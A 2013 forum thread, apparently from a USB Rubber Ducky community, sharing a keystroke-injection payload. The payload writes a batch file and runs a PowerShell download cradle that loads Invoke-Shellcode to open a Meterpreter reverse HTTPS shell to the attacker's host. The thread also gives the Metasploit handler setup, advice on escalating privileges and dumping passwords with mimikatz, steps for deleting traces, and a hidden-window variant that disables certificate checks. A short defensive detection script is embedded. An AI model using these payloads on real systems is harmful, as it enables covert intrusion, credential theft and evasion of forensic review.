Xcellerator Posted September 26, 2013

Hey guys, I've been playing around with powershell and also been looking into Powersploit (I really suggest you look into powersploit - it's got some amazing stuff in it!). Anyway, I came across this: http://www.pentestgeek.com/2013/09/18/invoke-shellcode/, and I thought it would work great as a ducky script!

First, here is the actual Duckyscript code you need to run on the target machine, ONLY AFTER setting up the listener in metasploit below.

DELAY 5000
GUI r
DELAY 500
STRING cmd
ENTER
STRING cd %TEMP%
ENTER
STRING copy con met.cmd
ENTER
STRING start C:/Windows/System32/Ribbons.scr /s
ENTER
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <IP_ADDRESS> -Lport <PORT> -Force"
ENTER
CTRL z
ENTER
DELAY 100
STRING met.cmd && exit
ENTER

Just make sure you remember to change <IP_ADDRESS> to your actual IP Address and <PORT> to the port you want to run the session over.

Now, in a terminal window in a linux distro (make sure you have metasploit installed), make a file with this as its contents, obviously changing the values in < and > to match your settings:

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST <IP_ADDRESS>
set LPORT <PORT>
exploit -j -z

Name it whatever you want with a .rc extension.

### MAKE SURE YOU DO THIS BEFORE YOU EXECUTE THE PAYLOAD ON THE MACHINE! IT IS A REVERSE SHELL, NOT A BIND SHELL ###

Run this in the terminal:

msfconsole -r ./fileyoujustmade.rc

Let everything start up and ensure there are no errors. (You might get an error with a port already being in use on your machine, or permissions problems if you try and use port 443 on Debian systems without being root). Now, run the payload from the ducky on the target machine. Once you see the screensaver appear, you're good to remove the Ducky.

It may take up to 10 seconds for you to receive your shell as it has to connect out to the internet to load the Invoke-Shellcode plugin and then actually generate and load the meterpreter into memory.

Issues I encountered: I found that my metasploit just sat at "Meterpreter shell 1 opened at....". This could be because it attempts to automatically run the smart_migrate module upon connection. All I did to resolve this was to hit enter to get the msf prompt back, and then connect into the meterpreter session and run smart_migrate automatically. Smart_migrate can be found at post/windows/manage/smart_migrate in the metasploit trunk. Although, be warned - smart_migrate automatically attempts to migrate into explorer.exe which ##DOES NOT## have administrative privileges. So, you'll have to utilise the post modules to grant yourself admin and eventually even SYSTEM (if you want to dump firefox/chrome/IE passwords, hashes or use mimikatz or WCE to get the wDigest passwords from memory). I'd recommend the bypass_uac or ask modules to grab yourself admin - particularly ask in lower security environments.

For the forensics-conscious: If you're concerned about remaining undetected on the machine you've got the shell on, then I recommend the following steps:
1. Delete met.cmd from %TEMP% - You don't want it to come back to bite you on the ass once you're done with the machine.
2. Kill the powershell.exe process once you've migrated out of it.

Hope you all enjoy! I know many of you will find good use of this, and as always - use responsibly! ;-P
TeCHemically Posted October 4, 2013

Very nice! I am having issues though. When the powershell command is entered a ton of red text flies by and the window disappears. No shell results. Sorry I don't have more information. Any help and direction is appreciated!
hzm74 Posted October 9, 2013

I too have the red text in the command screen. Other question: does the attacked computer need to be logged in as an admin to let this work? Thnx
b00stfr3ak Posted October 9, 2013

I have not tried this script but you might need to change your execution policy. I believe the execution policy is set to Restricted by default, so you cannot execute any powershell scripts. You can check this by executing Get-ExecutionPolicy. To get this script to work try to execute Set-ExecutionPolicy Unrestricted or Set-ExecutionPolicy Unrestricted -force, but you must be an admin to do this.
Xcellerator (Author) Posted October 9, 2013

Yeah, I'm pretty sure it's an execution policy issue. Try appending "-ep bypass" just after "powershell". If it works, let me know and I'll update the original post.
hzm74 Posted October 10, 2013

So the target machine needs to be logged in as an admin to let this work?
b00stfr3ak Posted October 11, 2013

I just tested the powershell command and confirmed it works without any problems. Can you post the errors you are getting? Admin is not needed, and my execution policy is set to Restricted. I thought it downloaded the script and then you had to run it. Looks like powershell keeps the script in memory and you can call the functions from there - pretty sweet.

Edited October 11, 2013 by b00stfr3ak
Xcellerator (Author) Posted October 11, 2013

Oh, good. I'd thought I'd tested it on a machine with Restricted Execution Policy, but I assumed I'd got it wrong from the errors people are getting. Not to sound silly, but you are changing <IP_ADDRESS> and <PORT> to actual values, aren't you?
b00stfr3ak Posted October 11, 2013

I'm going to add a version of this to my power-ducky tool kit:

powershell -windowstyle hidden "[system.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };IEX (New-Object Net.WebClient).DownloadString('https://172.26.4.38:8080/')"

It will create a https server socket and then the client will grab the powershell script and run it with a hidden window.
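From the defender's side, the command lines in this thread (the DownloadString/IEX cradle in the first post, the "-ep bypass" variant suggested above, and the hidden-window, certificate-validation-disabled variant in this post) are what process-creation telemetry sees. The following is an added example, not code from this thread or from PowerSploit: a weighted scorer over constructed Sysmon-style process-creation records (the records, PIDs and the 192.0.2.10 address are all made up for the example).

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style);
# not real telemetry. They mirror the command lines discussed in the thread.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "cmd.exe",
     "cmdline": 'powershell "IEX (New-Object Net.WebClient).DownloadString(\'http://bit.ly/14bZZ0c\'); '
                'Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.0.2.10 -Lport 8080 -Force"'},
    {"pid": 4188, "parent": "cmd.exe",
     "cmdline": 'powershell -windowstyle hidden "[system.Net.ServicePointManager]::ServerCertificateValidationCallback '
                '= { $true };IEX (New-Object Net.WebClient).DownloadString(\'https://192.0.2.10:8080/\')"'},
    {"pid": 4200, "parent": "cmd.exe",
     "cmdline": 'powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString(\'http://bit.ly/14bZZ0c\')"'},
    {"pid": 4300, "parent": "explorer.exe",           # benign: a signed admin script run by path
     "cmdline": 'powershell -File C:\\Scripts\\Backup-Profile.ps1'},
    {"pid": 4310, "parent": "services.exe",           # not powershell at all; ignored by the scorer
     "cmdline": 'C:\\Windows\\System32\\Ribbons.scr /s'},
]

# Weighted indicators: a single common flag on its own does not reach the alert threshold,
# but a download cradle combined with any evasion flag does.
INDICATORS = [
    ("download_cradle",          re.compile(r"Net\.WebClient.*DownloadString", re.I), 3),
    ("invoke_expression",        re.compile(r"\bIEX\b|Invoke-Expression", re.I),      2),
    ("exec_policy_bypass",       re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I), 2),
    ("hidden_window",            re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),     2),
    ("cert_validation_disabled", re.compile(r"ServerCertificateValidationCallback", re.I), 3),
    ("shellcode_loader",         re.compile(r"Invoke-Shellcode", re.I),               4),
    ("url_shortener",            re.compile(r"https?://bit\.ly/", re.I),              1),
]
ALERT_THRESHOLD = 4


def score_event(event):
    """Return (score, matched indicator names) for one process-creation record.

    Only powershell command lines are scored; everything else scores 0.
    """
    cmdline = event["cmdline"]
    if "powershell" not in cmdline.lower():
        return 0, []
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmdline)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits


def find_suspicious(events, threshold=ALERT_THRESHOLD):
    """Return the pids of records whose indicator score reaches the threshold."""
    return [e["pid"] for e in events if score_event(e)[0] >= threshold]
```

Real deployments would key the same logic off Sysmon Event ID 1 or Windows 4688 command-line auditing; the weights here are illustrative, not tuned.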
hzm74 Posted October 12, 2013

Hello, These are the "red" lines I'm getting:

C:\Users\*****>powershell ÏEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.3.109 -Lport 8080 -Force"
The term 'ÏEX' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:4
+ ÏEX <<<< (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.3.109 -Lport 8080 -Force
    + CategoryInfo : ObjectNotFound: (ÏEX:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
The term 'Invoke-Shellcode' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:89
+ ÏEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode <<<< -Payload windows/meterpreter/reverse_https -Lhost 192.168.3.109 -Lport 8080 -Force
    + CategoryInfo : ObjectNotFound: (Invoke-Shellcode:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

Thnx !! I believe it is the following: 'IEX' is changed to 'ÏEX'. This might be a keyboard language problem? Any help/suggestions?

Edited October 12, 2013 by hzm74
Xcellerator (Author) Posted October 12, 2013

Yeah, it looks like a keyboard encoder issue. It should be "IEX", not ÏEX. Have you ever had this issue before?
hzm74 Posted October 12, 2013

Solved it by adding a space after the ". I have US-international. But, problem solved.
hzm74 Posted October 12, 2013

I can confirm it works when the tested machine is logged in as an admin. Will try now with a user account.
Xcellerator (Author) Posted October 12, 2013

As long as powershell is permitted for standard users, it shouldn't be a problem running as non-admin. This is most likely the case for personal machines. However, in a domain environment, you'd be bloody lucky if powershell were available to anyone except local and domain admins, so you're basically out of luck. Unless you have access to a server room for a minute or so.. :-P
b00stfr3ak Posted October 15, 2013

Created a quick script that will allow you to use any server to host the powershell script and any powershell script to execute on the victim's computer. The web server that the script will set up is real basic and you can use http or https. You can also add a real cert if you want; right now it is just self-signed. It doesn't set anything up for the ducky yet, that will come soon. Working on something else right now that has me a little stuck (transferring 40MB of data using powershell and ssl). But this will be added by this weekend. https://github.com/b00stfr3ak/fast_meterpreter